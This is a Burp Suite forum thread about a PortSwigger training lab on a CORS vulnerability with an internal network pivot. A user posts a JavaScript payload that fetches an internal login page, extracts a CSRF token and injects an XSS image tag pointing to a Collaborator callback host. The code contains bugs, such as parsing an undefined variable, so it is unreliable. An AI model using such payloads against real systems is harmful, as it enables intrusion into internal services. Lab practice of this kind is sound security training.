Burp Suite User Forum

Create new post

Lab: CORS vulnerability with internal network pivot attack

P1N | Last updated: May 15, 2023 08:34PM UTC

The LAB doesn't work, so I tried it myself, because we overestimate it, it doesn't work !! <script> bu_url = 'https://' + 'pf8ramweqox3mawt6h1l1w6v3m9ex3.oastify.com'; url = `http://192.168.0.135:8080/login`; fetch(url).then(response => response.text()).then(text => { const pareser = new DOMParser(); const doc = pareser.parseFromString(date, 'text/html'); const csr = doc.getElementsByName('csrf')[0].defaultValue; var pa = `"><img src='${bu_url}'?foundXSS=1>` var url_pa = 'http://192.168.0.135:8080/login?time=' + Date.now() + '&username=' + encodeURIComponent(pa) + '&password=test&csrf=' +csr; location = encodeURIComponent(url_pa); }) </script>

Ben, PortSwigger Agent | Last updated: May 16, 2023 08:09AM UTC

Hi, I have just run through this lab and was able to solve it using the written solution so it does appear to be working as expected. Have you tried following the solution?

P1N | Last updated: May 16, 2023 09:21PM UTC

I have visited your decisions and my own several times

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.